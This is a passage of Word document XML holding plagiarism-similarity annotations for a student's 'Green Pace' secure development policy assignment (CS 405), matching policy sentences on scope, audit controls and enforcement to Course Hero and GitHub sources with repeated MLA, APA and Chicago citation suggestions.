                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</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Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies. Write policies for each and explain what it is, how it should ...">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daa55wg8" int2:invalidationBookmarkName="" int2:hashCode="qhUeTc/QiPyf/t" int2:id="QgX44fro">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="This document applies to all staff that create, deploy, or support custom software at Green Pace.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405 Project 1 - 2.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/" int2:sourceSnippet="Scope This document applies to all staff that create, deploy, or support custom software at Green Pace. Module Three Milestone Ten Core Security Principles Principles Write a short paragraph explaining each of the 10 principles of security. 1.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1 - 2.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1 - 2.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...” n.d., https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="Green Pace Secure Development: 10 Core Security Principles - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/230969718/CS-405-Security-Policydocx/" int2:sourceSnippet="Scope This document applies to all staff that create, deploy, or support custom software at Green Pace. Module Three Milestone Ten Core Security Principles PrinciplesWrite a short paragraph explaining each of the 10 principles of security. 1.ValidateInput DataAll incoming data must undergo rigorous validation to ensure it adheres to expected ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development: 10 Core Security Principles - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development: 10 Core Security Principles - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development: 10 Core Security Principles - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Secure Development: 10 Core Security Principles - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/230969718/CS-405-Security-Policydocx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Secure Development: 10 Core Security Principles - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/230969718/CS-405-Security-Policydocx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Green Pace Secure Development: 10 Core Security Principles - Course Hero” n.d., https://www.coursehero.com/file/230969718/CS-405-Security-Policydocx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405 Project 1.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/98618758/CS-405-Project-1docx/" int2:sourceSnippet="Green Pace Developer: Security Policy Guide Template Green Pace Secure Development Policy. ... Scope This document applies to all staff that create, deploy, or support custom software at Green Pace. Module Three Milestone Ten Core Security Principles Principles Write a short paragraph explaining each of the 10 principles of security. 1.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/98618758/CS-405-Project-1docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/98618758/CS-405-Project-1docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS 405 Project 1.docx - Green Pace Developer: Security...” n.d., https://www.coursehero.com/file/98618758/CS-405-Project-1docx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_9xP0OoE9" int2:invalidationBookmarkName="" int2:hashCode="eo5ByhszgMvR9X" int2:id="RZhXGdsO">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Every software development effort must be able to provide evidence of compliance for each software deployed into any Green Pace managed environment.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="Green pace already has a well established devops - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/" int2:sourceSnippet="32 The only item you must complete beyond this point is the Policy Version History table. Audit Controls and Management Every software development effort must be able to provide evidence of compliance for each software deployed into any Green Pace managed environment. Evidence will include the following: Code compliance to standards Well-documented access-control strategies, with sampled ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Green pace already has a well established devops - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Green pace already has a well established devops - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Green pace already has a well established devops - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green pace already has a well established devops - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green pace already has a well established devops - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Green pace already has a well established devops - Course Hero” n.d., https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="Green Pace Secure Development Policy" int2:sourceUrl="https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx" int2:sourceSnippet="Every software development effort must be able to provide evidence of compliance for each software deployed into any Green Pace managed environment. Evidence will include the following: Code compliance to standards. Well-documented access-control strategies, with sampled evidence of compliance.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development Policy”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development Policy”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development Policy”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Secure Development Policy&lt;/i&gt;, https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Secure Development Policy&lt;/i&gt;. (n.d.). Retrieved from https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Green Pace Secure Development Policy” n.d., https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx.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Audit Controls and Management Every software development effort must be able to provide evidence of compliance for each software deployed into any Green Pace manage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lIyvGJC6" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="uqWaHJbv">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ViOSgwGD" int2:invalidationBookmarkName="" int2:hashCode="1McNKTnq2joxTX" int2:id="VX4VXHdm">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="You will list the number or numbers that apply to each standard, then explain how each of these principles supports the standard. This exercise demonstrates that you have based your security policy on widely accepted principles. Linking principles to standards is a best practice.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="You may have more than one principle for each standard, and the principles may be used more than once. Principles are numbered 1 through 10. You will list the number or numbers that apply to each standard, then explain how each of these principles supports the standard.">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imilarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_cUGXCjMc" int2:invalidationBookmarkName="" int2:hashCode="LpFUCY/81vIKaa" int2:id="WwZA0FAV">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="This policy is to be distributed to all Green Pace IT staff annually. All IT staff will need to certify acceptance and awareness of this policy annually.">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This policy is to be distributed to all Green Pace IT staff annually. All IT staff will need to certify acceptance and awareness of this policy annually. Policy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wPraLaHC" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="a5pXvc3E">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DZsuqV5Y" int2:invalidationBookmarkName="" int2:hashCode="pH/FGof+DtpAjN" int2:id="yCmGy3iw">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Any exception to the standards in this policy must be requested in writing with the following information:">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Exceptions Process Any exception to the standards in this policy must be requested in writing with the following information: Business or technical rationale Risk ...">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wSGE6OOu" int2:invalidationBookmarkName="" int2:hashCode="33w7VPlCrW+nUE" int2:id="g0QhauDA">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Consolidate all risk assessments into one table including both coding and systems standards, ordered by standard number.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="Use the DevSecOps diagram and provide an explanation using that diagram as context. 5. Insert your written explanation here. Summary of Risk Assessments Consolidate all risk assessments into one table, including both coding and systems standards, ordered by standard number. Rule Severity Likelihood STD-001High Unlikely CPP.">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51LUYS85" int2:invalidationBookmarkName="" int2:hashCode="VAcDTXWYezfYbb" int2:id="g30LiNeY">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="You will address each of the seven policy standards. Fill in the columns of severity, likelihood, remediation cost, priority, and level using the values provided in the appendix.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="Coding standards begin with the security policy. 2. Risk Assessment Complete this section of the coding standards tables. Enter high, medium, or low for each of the headers, then rate it overall using a scale from 1 to 5, with 5 being the greatest threat. You will address each of the seven policy standards.">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ource int2:sourceType="Online" int2:sourceTitle="Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="2. Risk Assessment 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
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_KyC2JOC2" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="gp5Au8DR">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HLMciRc8" int2:invalidationBookmarkName="" int2:hashCode="XocGW+KjjruHuS" int2:id="h8RB3x5m">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:contex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
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippe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Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="Risk Assessment Complete this section on the coding standards tables. Enter high, medium, ... logs, audits, meeting notes) Enforcement The office of the chief information security officer (OCISO) will enforce awareness and compliance of this policy, producing reports for the risk management committee (RMC) to review monthly.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</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meeting notes) Enforcement The office of the chief information security officer (OCISO) will enforce awareness and compliance of this policy, producing reports for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GaHd2O5w" int2:invalidationBookmarkName="" int2:hashCode="PJSyxv506mowGV" int2:id="jLpeP8k6">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Software development at Green Pace requires consistent implementation of secure principles to all developed applications. Consistent approaches and methodologies must be maintained through all policies that are uniformly defined, implemented, governed, and maintained over time.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="Software development at Green Pace requires consistent implementation of secure principles to all developed applications. Consistent approaches and methodologies must be maintained through all policies that are uniformly defined, implemented, governed, and maintained over time.">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 405 Project 1 - 2.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/" int2:sourceSnippet="2 Overview Software development at Green Pace requires consistent implementation of secure principles to all developed applications. Consistent approaches and methodologies must be maintained through all policies that are uniformly defined, implemented, governed, and maintained over time. Purpose This policy defines the core security principles; C/C++ coding standards; authorization ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1 - 2.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1 - 2.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...” n.d., https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="Green Pace Developer.docx - Green Pace Developer: Security... - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/119418266/Green-Pace-Developerdocx/" int2:sourceSnippet="3 Overview Software development at Green Pace requires consistent implementation of secure principles to all developed applications. Consistent approaches and methodologies must be maintained through all policies that are uniformly defined, implemented, governed, and maintained over time. Purpose This policy defines the core security principles; C/C++ coding standards; authorization ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“Green Pace Developer.docx - Green Pace Developer: Security... - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“Green Pace Developer.docx - Green Pace Developer: Security... - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“Green Pace Developer.docx - Green Pace Developer: Security... - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Green Pace Developer.docx - Green Pace Developer: Security... - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/119418266/Green-Pace-Developerdocx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Green Pace Developer.docx - Green Pace Developer: Security... - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/119418266/Green-Pace-Developerdocx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>“Green Pace Developer.docx - Green Pace Developer: Security... - Course Hero” n.d., https://www.coursehero.com/file/119418266/Green-Pace-Developerdocx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_9JdvPd4a" int2:invalidationBookmarkName="" int2:hashCode="h9s1HudugZHcln" int2:id="o4DPjaKU">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Provide the tool name, version, checker, and description. List one or more tools that can automatically detect this issue and its version number, name of the rule or check (preferably with link), and any relevant comments or description—if any.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="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 4.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_hwCUc3ZZ" int2:invalidationBookmarkName="" int2:hashCode="pdYNULDGXfDnQL" int2:id="oiStDddG">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Historical evidence of sustained practice (emails, logs, audits, meeting notes)">
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="Historical evidence of sustained practice (emails, logs, audits, meeting notes) Enforcement The office of the chief information security officer (OCISO) will enforce awareness and compliance of this policy, producing reports for the risk management committee (RMC) to review monthly.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;, https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;. (n.d.). Retrieved from https://github.com/BrandonRicks/CS-405-Secure-Coding</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
